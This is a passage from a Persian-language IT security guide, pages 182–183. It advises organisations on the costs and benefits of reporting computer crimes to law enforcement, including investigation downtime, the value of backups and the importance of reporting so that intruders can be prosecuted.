ﻣﻘﺎﻣﺎﺕ ﺷﻤﺎ ﺭﺍ ﺍﺯ ﺗﻼﺷﻬﺎﻳﺸﺎﻥ ﻣﻄﻠﻊ ﻣﻲﻛﻨﻨﺪ ﺗﺎ ﻧﺎﺭﺿﺎﻳﺘﻲ ﺷﻤﺎ
ﺭﺍ ﺑﻪ ﺣﺪﺍﻗﻞ ﺑﺮﺳﺎﻧﻨﺪ .ﺑﺎ ﺍﻳﻨﺤـﺎﻝ ﺍﮔـﺮ ﻧﻔـﻮﺫﮔﺮﺍﻥ ﺍﺯ ﻛﺎﺭﻣﻨـﺪﺍﻥ
ﺧﻮﺩﺗﺎﻥ ﺑﺎﺷﻨﺪ ﻭ ﻳﺎ ﭘﺎﻱ ﻣﺴﺎﺋﻞ ﺣﺴﺎﺳﻲ ﭼﻮﻥ ﺍﻃﻼﻋﺎﺕ ﺭﺳﻤﻲ
ﻭ ﻧﻈﺎﻣﻲ ﺩﺭ ﻣﻴﺎﻥ ﺑﺎﺷﺪ ،ﻣﻤﻜﻦ ﺍﺳﺖ ﺷﻤﺎ ﻧﻈـﺎﺭﺗﻲ ﺭﻭﻱ ﺭﻭﺵ
ﻭ ﻣﺪﺗﻲ ﻛﻪ ﺳﻴـﺴﺘﻤﻬﺎ ﻭ ﺭﺳـﺎﻧﻪﻫـﺎﻱ ﺫﺧﻴـﺮﻩﺳـﺎﺯﻳﺘﺎﻥ ﺗﺤـﺖ
ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ .ﺍﻳﻦ ﻣﺸﻜﻞ ﺯﻣﺎﻧﻲ ﺣـﺎﺩﺗﺮ
ﻣﻲ ﺷﻮﺩ ﻛﻪ ﺑﺎﺯﺭﺳﺎﻥ ﭘﺮﻭﻧـﺪﻩ ﻧﻴﺎﺯﻣﻨـﺪ ﻫﻤﻜـﺎﺭﻱ ﻣﺘﺨﺼـﺼﺎﻧﻲ
ﺧﺎﺭﺝ ﺍﺯ ﺩﻓﺎﺗﺮ ﻣﺤﻠﻲ ﺧﻮﺩ ﻧﻴﺰ ﺑﺎﺷﻨﺪ .ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛـﻪ
ﺯﻣﺎﻥ ﺍﻳﺠﺎﺩ ﻭﻗﻔﻪ ﺩﺭ ﻛﺎﺭ ﺑﺪﻟﻴﻞ ﺷﺮﺍﻳﻂ ﺍﺟﺒﺎﺭﻱ ﺍﻧﺠﺎﻡ ﺗﺤﻘﻴﻘﺎﺕ
ﺭﺍ ﻣﺤﺎﺳﺒﻪ ﻣﻲﻧﻤﺎﻳﻴﺪ؛ ﭼﺮﺍﻛﻪ ﺍﻳﻦ ﺯﻣﺎﻥ ﻭ ﺧﺴﺎﺭﺗﻬﺎﻱ ﻧﺎﺷـﻲ ﺍﺯ
ﺁﻥ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻌﻨﻮﺍﻥ ﻗﺴﻤﺘﻲ ﺍﺯ ﺁﺳـﻴﺒﻬﺎﻱ ﻭﺍﺭﺩﺓ ﻫﻨﮕـﺎﻡ ﭘﻴﮕـﺮﺩ
ﻗﺮﺍﺭ ﮔﻴﺮﺩ ﻭ ﻣﺘﻌﺎﻗﺒﹰﺎ ﺩﺭ ﻫﺮ ﺩﺍﺩﺧﻮﺍﺳﺖ ﻣـﺪﻧﻲ )ﺩﺍﺩﺧﻮﺍﺳـﺘﻬﺎﻳﻲ ﻛـﻪ
ﻣﻲﺗﻮﺍﻧﺪ ﻋﻠﻴﻪ ﻣﻬﺎﺟﻢ ﻭ ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﻧﻴﺰ ﻋﻠﻴﻪ ﺧـﻮﺩ ﺩﻭﺍﻳـﺮ ﺍﺟـﺮﺍﻱ ﻗـﻮﺍﻧﻴﻦ
ﺗﻨﻈﻴﻢ ﺷﻮﺩ( ﺑﻜﺎﺭ ﺭﻭﺩ.
ﺩﺭ ﺟﺮﻳﺎﻥ ﺗﺤﻘﻴﻘﺎﺕ ﻧﺴﺨﻪﻫـﺎﻱ ﭘـﺸﺘﻴﺒﺎﻥ ﺍﺯ ﻣﻨـﺎﺑﻊ ﺑـﺴﻴﺎﺭ ﺑـﺎ
ﺍﺭﺯﺵ ﺑﻪ ﺷـﻤﺎﺭ ﻣـﻲﺭﻭﻧـﺪ .ﻋـﻼﻭﻩ ﺑـﺮ ﺍﻳـﻦ ،ﺩﺭﺻـﻮﺭﺕ ﻟـﺰﻭﻡ
ﺑﺨﺶ ﺳﻮﻡ
•
ﻣﺮﺍﺟﻊ ﻣﺤﻠﻲ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑـﻪ ﭘﻴﮕﻴـﺮﻱ ﺷـﻜﺎﻳﺖ ﺷـﻤﺎ
ﻋﻼﻗﺔ ﺑﻴﺸﺘﺮﻱ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﻨﺪ؛ ﭼـﻮﻥ ﺑـﻪ ﺍﺣﺘﻤـﺎﻝ ﺯﻳـﺎﺩ
ﻣﺸﻜﻠﻲ ﻛﻪ ﺑﺮﺍﻱ ﺷﻤﺎ ﭘﻴﺶ ﺁﻣﺪﻩ ﺩﺭ ﻛﻨﺎﺭ ﻫﺰﺍﺭﺍﻥ ﻣـﻮﺭﺩ
ﻣﺸﺎﺑﻪ ﺩﻳﮕﺮ )ﺑﻪ ﺁﻥ ﺍﻧﺪﺍﺯﻩ ﻛـﻪ ﺩﺭ ﺳـﻄﺢ ﻛـﺸﻮﺭﻱ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ(
ﻗﺮﺍﺭ ﻧـﺪﺍﺭﺩ .ﺑﻨـﺎﺑﺮﺍﻳﻦ ﺍﺣﺘﻤـﺎﻝ ﺑﻴـﺸﺘﺮﻱ ﻭﺟـﻮﺩ ﺧﻮﺍﻫـﺪ
ﺩﺍﺷﺖ ﻛﻪ ﻣﺴﺌﻮﻻﻥ ﻣﺤﻠـﻲ ﺑـﻪ ﻣـﺸﻜﻞ ﺷـﻤﺎ ﺍﻫﻤﻴـﺖ
ﺩﻫﻨﺪ؛ ﺣﺘﻲ ﺍﮔﺮ ﺁﻥ ﻣﺸﻜﻞ ﺧﻴﻠﻲ ﻛﻮﭼﻚ ﺑﺎﺷﺪ.
ﺩﺭ ﺣﺎﻻﺕ ﺩﻳﮕﺮ ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺷﻤﺎ ﺻـﺮﻓﻨﻈﺮ ﻛﻨﻨـﺪ
ﺗﺎ ﻓﻘﺪﺍﻥ ﺍﻃﻼﻋﺎﺕ ﺧﻮﺩ ﺭﺍ ﺑﭙﻮﺷﺎﻧﻨﺪ ﻭ ﺍﺯ ﺯﻳﺮ ﺳﺆﺍﻝ ﺭﻓﺘﻦ ﺍﻋﺘﺒﺎﺭ
ﺩﻭﺍﻳﺮ ﺍﺟﺮﺍﻱ ﻗﻮﺍﻧﻴﻦ ﺟﻠﻮﮔﻴﺮﻱ ﻧﻤﺎﻳﻨﺪ .ﻻﺯﻡ ﺑﻪ ﺫﻛﺮ ﺍﺳﺖ ﻛﻪ ﺩﺭ
ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﻮﺍﺭﺩ ﺍﻳﻦ ﺍﺣﺘﻤﺎﻝ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺧﻮﺩ ﻗﺮﺑﺎﻧﻲ ﻫﻢ ﺩﺭ
ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺟﻨﺎﻳﻲ ﻧﻘﺶ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ .ﻳـﻚ ﺑـﺎﺯﺭﺱ ﺑﺎﺗﺠﺮﺑـﻪ ﺩﺭ
ﺩﻧﻴﺎﻱ ﻭﺍﻗﻌﻲ ،ﺑﻪ ﻧﻈﺮﺍﺕ ﻗﺮﺑﺎﻧﻲ ﺍﻃﻤﻴﻨﺎﻥ ﻛﺎﻣﻞ ﻭ ﺑـﻲ ﺷـﻚ ﻭ
ﺷﺒﻬﻪ ﻧﻤﻲﻧﻤﺎﻳﺪ؛ ﻭ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺑﺮﺍﻱ ﺟﺮﺍﺋﻢ ﺩﻧﻴـﺎﻱ ﺳـﺎﻳﺒﺮ ﻫـﻢ
ﺻﺪﻕ ﻣﻲﻛﻨﺪ.
١٨٢
ﻣﻲ ﺗﻮﺍﻧﻴﺪ ﻫﻨﮕﺎﻣﻴﻜﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﺻﻠﻲ ﺷﻤﺎ ﺗﺤـﺖ ﺑﺎﺯﺭﺳـﻲ ﻭ
ﺁﺯﻣﺎﻳﺶ ﺍﺳﺖ ،ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ.
ﻭﻗﺘﻲ ﺑﺎ ﺩﻭﺍﻳﺮ ﺍﺟﺮﺍﻱ ﻗﺎﻧﻮﻥ ﺑﺮﺍﻱ ﺍﻧﺠـﺎﻡ ﺗﺤﻘﻴﻘـﺎﺕ ﻫﻤﻜـﺎﺭﻱ
ﻣــﻲﻛﻨﻴــﺪ ،ﻣﻤﻜــﻦ ﺍﺳــﺖ ﺩﺭ ﺍﺛــﺮ ﺳــﻨﮕﻴﻨﻲ ﻭ ﻧﺎﻛﺎﺭﺁﻣــﺪﻱ ﺁﻥ
ﺗﺤﻘﻴﻘﺎﺕ ،ﺩﻳﺪ ﺟﺎﻣﻌﺔ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻧـﺴﺒﺖ ﺑـﻪ ﺷـﻤﺎ ﻣﻨﻔـﻲ ﺷـﻮﺩ.
ﺑﻴﺸﺘﺮ ﻛﺎﺭﺑﺮﺍﻥ ﺭﺍﻳﺎﻧﻪ ﺩﻳﺪﮔﺎﻫﻲ ﻣﻨﻔﻲ ﻧﺴﺒﺖ ﺑﻪ ﻣﺠﺮﻳﺎﻥ ﻗـﺎﻧﻮﻥ
ﺩﺍﺭﻧﺪ ﻭ ﺍﮔﺮ ﺷﻤﺎ ﻫﻢ ﺩﺭ ﺁﻥ ﺟﺎﻳﮕﺎﻩ ﻗﺮﺍﺭ ﺑﮕﻴﺮﻳﺪ ،ﺍﻳﻦ ﺍﺣﺴﺎﺳﺎﺕ
ﻣﺘﻮﺟﻪ ﺷﻤﺎ ﻧﻴﺰ ﻣﻲﺷﻮﺩ .ﭼﻨﻴﻦ ﻗـﻀﺎﻭﺗﻬﺎﻳﻲ ﻣـﻲﺗﻮﺍﻧـﺪ ﺟﺎﻳﮕـﺎﻩ
ﺷﻤﺎ ﺭﺍ ﺩﺭ ﺍﻧﻈﺎﺭ ﭘﺎﻳﻴﻨﺘﺮ ﺍﺯ ﺁﻧﭽﻪ ﻛﻪ ﻣـﺴﺘﺤﻖ ﺁﻥ ﻫـﺴﺘﻴﺪ ﻗـﺮﺍﺭ
ﺩﻫﺪ ﻭ ﺍﺯ ﻫﻤﻜﺎﺭﻱ ﺷﻤﺎ ﻧﻪ ﺗﻨﻬﺎ ﺑﺎ ﺁﻥ ﺗﺤﻘﻴﻘﺎﺕ ﺑﻠﻜـﻪ ﺑـﺎ ﺳـﺎﻳﺮ
ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺗﺨﺼﺼﻲ ﻧﻴﺰ ﺟﻠﻮﮔﻴﺮﻱ ﻛﻨﺪ .ﻋﻼﻭﻩ ﺑﺮ ﺍﻳـﻦ ﭘـﺲ ﺍﺯ
ﭘﺎﻳﺎﻥﻳﺎﻓﺘﻦ ﺑﺎﺯﺭﺳﻲ ﻣﻤﻜﻦ ﺍﺳﺖ ﺁﻣﺎﺝ ﺣﻤﻼﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﻳـﺎ
ﺳﺎﻳﺮ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩﻫﺎ ﻗﺮﺍﺭ ﺑﮕﻴﺮﻳﺪ.
ﺍﻳﻦ ﺭﻓﺘﺎﺭﻫﺎ ﻣﺎﻳـﺔ ﺗﺄﺳـﻔﻨﺪ ،ﭼﺮﺍﻛـﻪ ﺑـﻪ ﻫـﺮ ﺣـﺎﻝ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ
ﺑﺎﺯﺭﺳــﺎﻥ ،ﺩﻗﻴــﻖ ﻭ ﺣﺮﻓــﻪﺍﻱ ﻫــﺴﺘﻨﺪ ﻭ ﻣﻤﻜــﻦ ﺍﺳــﺖ ﺑــﺮﺍﻱ
ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﻳﻚ ﻓﻌﺎﻟﻴﺖ ﻣﺸﻜﻮﻙ ﻳﺎ ﺗﻬﺎﺟﻢ ﺩﺍﺋﻤﻲ ،ﻭﺍﻗﻌـﹰﺎ ﺑـﻪ
ﺑﺎﺯﺭﺳﻴﻬﺎﻱ ﻣﻮﺷﻜﺎﻓﺎﻧﻪ ﻧﻴـﺎﺯ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻨﺪ .ﺍﻣـﺮﻭﺯ ﻣـﻲﺗـﻮﺍﻧﻴﻢ
ﺑﮕﻮﻳﻴﻢ ﻛﻪ ﺍﻳﻦ ﻣﺸﻜﻞ ﺩﺭ ﺳﺎﻟﻬﺎﻱ ﺍﺧﻴﺮ ﻛﻤﺘﺮ ﺷﺪﻩ ﻭ ﻧﮕﺮﺍﻧﻴﻬـﺎ
ﺩﺭ ﻣﻮﺭﺩ ﺁﻥ ﻧﺴﺒﺖ ﺑﻪ ﺩﻫﺔ ﮔﺬﺷﺘﻪ ﻛﺎﻫﺶ ﻳﺎﻓﺘﻪ ﺍﺳﺖ .ﺑﻪ ﻣﺮﻭﺭ
ﺯﻣﺎﻥ ﻭ ﺑﺎ ﺁﮔﺎﻫﺘﺮ ﺷﺪﻥ ﻣﺮﺩﻡ ﻧﺴﺒﺖ ﺑﻪ ﺧﺴﺎﺭﺗﻬﺎﻱ ﻧﻔﻮﺫﮔﺮﺍﻥ -
ﺣﺘﻲ ﺁﻧﻬﺎ ﻛﻪ ﺳﻮﺀ ﻧﻴﺘﻲ ﻧﺪﺍﺷﺘﻪﺍﻧﺪ -ﺍﻧﺘﻈﺎﺭ ﺍﻳﻦ ﺍﺳـﺖ ﻛـﻪ ﺍﻳـﻦ
ﺍﺣﺴﺎﺳﺎﺕ ﻣﻨﻔﻲ ﻧﺴﺒﺖ ﺑﻪ ﻣﺮﺍﺟﻊ ﻗﺎﻧﻮﻧﻲ ﺍﺯ ﺍﻳﻦ ﻫـﻢ ﻛﻤﺮﻧﮕﺘـﺮ
ﺷﻮﺩ.
ﺗﻮﺻﻴﺔ ﺍﻛﻴﺪ ﻣﺎ ﺑﻪ ﺷﻤﺎ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻫﻨﮕﺎﻡ ﺗـﺼﻤﻴﻢﮔﻴـﺮﻱ ﺩﺭ
ﻲ ﺳﻴﺴﺘﻢ ﺧـﻮﺩ ﺑـﺎ
ﻣﻮﺭﺩ ﺩﺭﻣﻴﺎﻥ ﮔﺬﺍﺷﺘﻦ ﻫﺮﮔﻮﻧﻪ ﻣﺸﻜﻞ ﺍﻣﻨﻴﺘ ﹺ
ﻣﺮﺍﺟﻊ ﻗﺎﻧﻮﻧﻲ ﺧﻮﺏ ﻓﻜﺮ ﻛﻨﻴﺪ ﻭ ﺟﻮﺍﻧﺐ ﺍﻣـﺮ ﺭﺍ ﻣـﻮﺭﺩ ﺑﺮﺭﺳـﻲ
ﻗﺮﺍﺭ ﺩﻫﻴﺪ .ﺩﺭ ﺑﻴﺸﺘﺮ ﻣﻮﺍﻗﻊ ﺑﻬﺘـﺮ ﺍﺳـﺖ ﺑـﺴﻨﺠﻴﺪ ﻛـﻪ ﺩﺭ ﭼـﻪ
ﺻﻮﺭﺕ ﻣﺮﺍﺟﻌﻪ ﺑﻪ ﻣﺮﺍﺟﻊ ﻗﻀﺎﻳﻲ ﻻﺯﻡ ﺍﺳﺖ :ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﻭﺍﻗﻌﹰﺎ
ﭼﻴــﺰﻱ ﺭﺍ ﺍﺯ ﺩﺳــﺖ ﺩﺍﺩﻩ ﻭ ﻣﺘﺤﻤــﻞ ﺿــﺮﺭ ﺷــﺪﻩﺍﻳــﺪ ﻭ ﻳــﺎ
ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺷﺨﺼﹰﺎ ﻗﺎﺩﺭ ﺑﻪ ﻛﻨﺘﺮﻝ ﻭﺿﻌﻴﺖ ﭘﻴﺶﺁﻣﺪﻩ ﻧﻴـﺴﺘﻴﺪ.
ﺑﻌﻀﻲ ﺍﻭﻗﺎﺕ ﻫﻴﺎﻫﻮﻱ ﻧﺎﺷﻲ ﺍﺯ ﻳﻚ ﺍﺗﻔﺎﻕ ﺧﻄﺮﻧـﺎﻛﺘﺮ ﺍﺯ ﺳـﺎﻳﺮ
ﺧﺴﺎﺭﺗﻬﺎﻳﻲ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﭘﻲ ﻭﻗﻮﻉ ﺁﻥ ﺍﺗﻔﺎﻕ ﺑﻪ ﺑﺎﺭ ﻣﻲﺁﻳﺪ.
ﺑﻌﺪ ﺍﺯ ﺍﻳﻨﻜﻪ ﺗﺼﻤﻴﻢ ﺑﻪ ﺍﺳﺘﻤﺪﺍﺩ ﺍﺯ ﻣﺮﺍﺟﻊ ﻗﺎﻧﻮﻧﻲ ﮔﺮﻓﺘﻴﺪ ﺍﺯ ﺑﻪﭘﺎ
ﻛﺮﺩﻥ ﻫﻴﺎﻫﻮ ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨﻪ ﺑﭙﺮﻫﻴﺰﻳﺪ .ﺩﺭ ﺑﻌﻀﻲ ﻣـﻮﺍﺭﺩ ﺩﺧﺎﻟـﺖ
ﻣﺮﺍﺟﻊ ﻗﺎﻧﻮﻧﻲ ﻣﻲ ﺗﻮﺍﻧﺪ ﻋﺎﻣﻞ ﺩﻟﺴﺮﺩﻱ ﻧﻔﻮﺫﮔﺮﺍﻥ ﺑﺎﺷﺪ ،ﺍﻣـﺎ ﺩﺭ
ﺑﻌﻀﻲ ﻣﻮﺍﺭﺩ ﻧﻴـﺰ ﻣـﻲﺗﻮﺍﻧـﺪ ﺷـﻤﺎ ﺭﺍ ﺩﺭ ﻛـﺎﻧﻮﻥ ﺗﻮﺟـﻪ ﺁﻧﻬـﺎ ﻭ
ﺩﺭﻧﺘﻴﺠﻪ ﺣﻤﻼﺕ ﺑﻴﺸﺘﺮ ﻗﺮﺍﺭ ﺩﻫﺪ .ﺁﮔﺎﻩ ﺑﺎﺷﻴﺪ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳـﺖ
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﻣﺸﻜﻞ ﻓﻌﻠﻲ ﺷﻤﺎ ﺟﺰﺋﻲ ﺍﺯ ﻳﻚ ﻣﺸﻜﻞ ﮔﺴﺘﺮﺩﻩﺗـﺮ ﺑﺎﺷـﺪ ﻛـﻪ
ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﻭ ﮔﺴﺘﺮﺵ ﺍﺳﺖ ﻭ ﻟﺬﺍ ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺑﺪﺭﺳﺘﻲ ﺁﻧـﺮﺍ
ﻣﺪﻳﺮﻳﺖ ﻧﻜﻨﻴﺪ ﺑﺎﻋﺚ ﻭﺍﺭﺩ ﺁﻣﺪﻥ ﺁﺳﻴﺒﻬﺎﻱ ﻓﺮﺍﻭﺍﻧـﻲ ﺑـﻪ ﺷـﻤﺎ ﻭ
ﺩﻳﮕﺮﺍﻥ ﺷﻮﺩ.
ﻣﺎ ﻋﻼﻗﻪﻣﻨﺪﻳﻢ ﻛﻪ ﺧﻮﺷﺒﻴﻨﺎﻧﻪ ﺑـﻪ ﺍﻳـﻦ ﻣﻮﺿـﻮﻉ ﻧﮕـﺎﻩ ﻛﻨـﻴﻢ.
ﻣﺮﺍﺟﻊ ﻗﺎﻧﻮﻧﻲ ﺑﻄﻮﺭ ﻛﻠـﻲ ﺍﺯ ﻧﻴـﺎﺯ ﺑـﻪ ﺍﺭﺗﻘـﺎﻱ ﺳـﻄﺢ ﺧـﻮﺩ ﺩﺭ
ﻻ ﺩﺭ ﺗﻼﺷـﻨﺪ ﻛـﻪ
ﺑﺮﺭﺳﻲ ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺍﻃﻼﻉ ﺩﺍﺭﻧﺪ ﻭ ﻣﻌﻤﻮ ﹰ
ﻣﺮﺍﻛﺰ ﺁﻣﻮﺯﺷﻲ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻛﻨﻨﺪ ،ﺗﺸﻜﻴﻼﺕ ﻭ ﺗﺴﻬﻴﻼﺕ ﺗﺤﻠﻴـﻞ
ﻗﺎﻧﻮﻧﻲ ﺗﻬﻴﻪ ﻧﻤﺎﻳﻨﺪ ،ﻭ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺩﻳﮕﺮﻱ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺗﺤﻘﻴﻘـﺎﺕ
ﺛﻤﺮﺑﺨﺶ ﺭﺍ ﺑﻜﺎﺭ ﮔﻴﺮﻧﺪ .ﻣﻌﻤﻮ ﹰ
ﻻ ﺩﺭ ﺩﺍﺩﺳﺮﺍﻫﺎ )ﺧﺼﻮﺻﹰﺎ ﺩﺭ ﻣﻨﺎﻃﻖ
ﭘﻴﺸﺮﻓﺘﺔ ﻛﺸﻮﺭ( ﺑﻌﻀﻲ ﺑﺎﺯﺭﺳﺎﻥ ﻭ ﺩﺍﺩﻳﺎﺭﻫﺎ ﺗﺠﺮﺑﺔ ﺯﻳـﺎﺩﻱ ﻛـﺴﺐ
ﻣﻲﻛﻨﻨﺪ ﻭ ﻟﺬﺍ ﺑﺎﻳﺪ ﺩﺭ ﺗﻼﺵ ﺑﺎﺷﻨﺪ ﻛـﻪ ﺍﻃﻼﻋـﺎﺕ ﺧـﻮﺩ ﺭﺍ ﺑـﻪ
ﺳﺎﻳﺮ ﻫﻤﻜﺎﺭﺍﻧﺸﺎﻥ ﻧﻴـﺰ ﺍﻧﺘﻘـﺎﻝ ﺩﻫﻨـﺪ .ﻧﺘﻴﺠـﺔ ﺍﻳـﻦ ﻓﺮﺁﻳﻨـﺪ ﺩﺭ
ﺳﺎﻟﻬﺎﻱ ﺍﺧﻴﺮ ﻳﻚ ﺍﺭﺗﻘﺎﻱ ﺍﺳﺎﺳﻲ ﺩﺭ ﺳـﻄﺢ ﻣﻮﻓﻘﻴـﺖ ﻓﻌﺎﻟﻴـﺖ
ﻧﻴﺮﻭﻫﺎﻱ ﺍﻧﺘﻈﺎﻣﻲ ﻭ ﺍﻧﺠـﺎﻡ ﺷـﺪﻥ ﺗﻌـﺪﺍﺩ ﺯﻳـﺎﺩﻱ ﺗﺤﻘﻴﻘـﺎﺕ ﻭ
ﺩﺍﺩﺭﺳﻴﻬﺎﻱ ﻣﻮﻓﻖ ﺩﺭ ﺣﻮﺯﺓ ﺟﺮﺍﺋﻢ ﺳﺎﻳﺒﺮ ﺑﻮﺩﻩ ﺍﺳﺖ .ﺑﻬﺘﺮ ﺍﺳﺖ
ﺑﻪ ﻓﻮﺍﻳﺪ ﺑﻴﺸﻤﺎﺭ ﮔﺰﺍﺭﺵﻛﺮﺩﻥ ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ -ﻧﻪ ﺗﻨﻬﺎ ﺑـﺮﺍﻱ
ﺧﻮﺩﺗــﺎﻥ ،ﺑﻠﻜــﻪ ﺑــﺮﺍﻱ ﺗﻤــﺎﻡ ﺟﺎﻣﻌــﻪ -ﺗﻮﺟــﻪ ﺩﺍﺷــﺘﻪ ﺑﺎﺷــﻴﺪ:
ﺩﺍﺩﺭﺳــﻴﻬﺎﻱ ﻣﻮﻓــﻖ ﻣــﻲﺗﻮﺍﻧﻨــﺪ ﺑﺎﻋــﺚ ﺟﻠــﻮﮔﻴﺮﻱ ﺍﺯ ﺳــﻮﺀ
ﺍﺳﺘﻔﺎﺩﻩﻫﺎﻱ ﺑﻌﺪﻱ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺷﻤﺎ ﻭ ﻧﻴﺰ ﺩﻳﮕﺮﺍﻥ ﺷﻮﻧﺪ.
ﻣﺴﺌﻮﻟﻴﺖ ﮔﺰﺍﺭﺵ ﺟﺮﻡ
ﺩﺭ ﭘﺎﻳﺎﻥ ﺑﻪ ﻳﺎﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﻳﻚ ﺟﺮﻡ ﺗﻨﻬﺎ ﺩﺭﺻﻮﺭﺗﻲ ﻣﻮﺭﺩ
ﭘﻴﮕﺮﺩ ﻗﻀﺎﻳﻲ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ ﻛﻪ ﺷﻤﺎ ﺁﻧﺮﺍ ﮔﺰﺍﺭﺵ ﻛـﺮﺩﻩ ﺑﺎﺷـﻴﺪ.
ﺩﺭ ﻏﻴﺮﺍﻳﻨﺼﻮﺭﺕ ﺍﻳﻨﻜﺎﺭ ﺍﻧﺠﺎﻡ ﻧﻤـﻲﺷـﻮﺩ ﻭ ﺍﻳـﻦ ﻧـﻪ ﺑـﻪ ﺳـﻮﺩ
ﺷﻤﺎﺳﺖ ﻭ ﻧﻪ ﻫﻴﭽﻜﺲ ﺩﻳﮕﺮ؛ ﻭ ﺩﺳﺖ ﻧﻔﻮﺫﮔﺮ ﺭﺍ ﻧﻴﺰ ﺑﺮﺍﻱ ﻭﺍﺭﺩ
ﺁﻭﺭﺩﻥ ﺁﺳﻴﺒﻬﺎﻱ ﺑﻴﺸﺘﺮ ﻭ ﺑﻪ ﺍﻓﺮﺍﺩ ﺩﻳﮕﺮ ﺑﺎﺯ ﻣﻲﮔـﺬﺍﺭﺩ .ﺑـﻪ ﻳـﺎﺩ
ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺁﻧﭽﻪ ﺷﻤﺎ ﺑﺎ ﺁﻥ ﺑﺮﺧﻮﺭﺩ ﻛﺮﺩﻩﺍﻳـﺪ
ﺟﺰﺋــﻲ ﺍﺯ ﻳــﻚ ﻣﺠﻤﻮﻋــﺔ ﻋﻈــﻴﻢ ﺟــﺮﺍﺋﻢ ﺭﺍﻳﺎﻧــﻪﺍﻱ ﻭ ﺍﻋﻤــﺎﻝ
ﺧﺮﺍﺑﻜﺎﺭﺍﻧﻪ ﺑﺎﺷﺪ .ﺑﺪﻭﻥ ﺍﻧﺠﺎﻡ ﺑﺮﺭﺳﻴﻬﺎﻱ ﻻﺯﻡ ﻧﻤـﻲﺗـﻮﺍﻥ ﺍﺩﻋـﺎ
ﻛﺮﺩ ﻛﻪ ﺁﻧﭽﻪ ﺑﺮ ﺳﺮ ﺷﻤﺎ ﺁﻣﺪﻩ ﻳﻚ ﺭﺧﺪﺍﺩ ﻣﺠﺰﺍ ﻭ ﺑﻲﺍﺭﺗﺒﺎﻁ ﺑـﺎ
ﺳﺎﻳﺮ ﺍﺟﺰﺍﻱ ﺳﻴﺴﺘﻢ ﺑﻮﺩﻩ ﻭ ﻳﺎ ﺟﺰﺋﻲ ﺍﺯ ﻳﻚ ﺗﻬﺎﺟﻢ ﺑﺰﺭﮔﺘﺮ.
ﻞ ﺩﻳﮕ ﹺﺮ ﻋﺪﻡ ﮔﺰﺍﺭﺵ ﺟﺮﺍﺋﻢ ﺳﻨﮕﻴﻦ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺍﻳـﻦ ﺍﺳـﺖ
ﻣﺸﻜ ﹺ
ﻛﻪ ﺑﺮﺧﻲ ﺑﻪ ﻏﻠﻂ ﺗﺼﻮﺭ ﺧﻮﺍﻫﻨﺪ ﻛﺮﺩ ﻛﻪ ﺍﻳﻦ ﺟﺮﺍﺋﻢ ﺑﻨﺪﺭﺕ ﺭﺥ
ﻣــﻲﺩﻫﻨــﺪ ﻭ ﺩﺭﻧﺘﻴﺠــﻪ ﺍﺣﺘﻤــﺎﻝ ﻭﻗــﻮﻉ ﺍﻳــﻦ ﻣــﺸﻜﻼﺕ ﺩﺭ
ﺳﻴﺴﺘﻤﻬﺎﻱ ﺧﻮﺩ ﺭﺍ ﻧﺎﭼﻴﺰ ﺧﻮﺍﻫﻨﺪ ﭘﻨﺪﺍﺷﺖ ،ﺭﻭﻱ ﺑﻮﺩﺟﻪﺑﻨﺪﻱ ﻭ
ﺁﻣﻮﺯﺵ ﻣﺄﻣﻮﺭﺍﻥ ﺟﺪﻳﺪ ﺍﺟﺮﺍﻳﻲ ﺗﺄﻛﻴﺪ ﺯﻳﺎﺩﻱ ﺑﻌﻤﻞ ﻧﺨﻮﺍﻫﺪ ﺁﻣﺪ؛
١٨٣
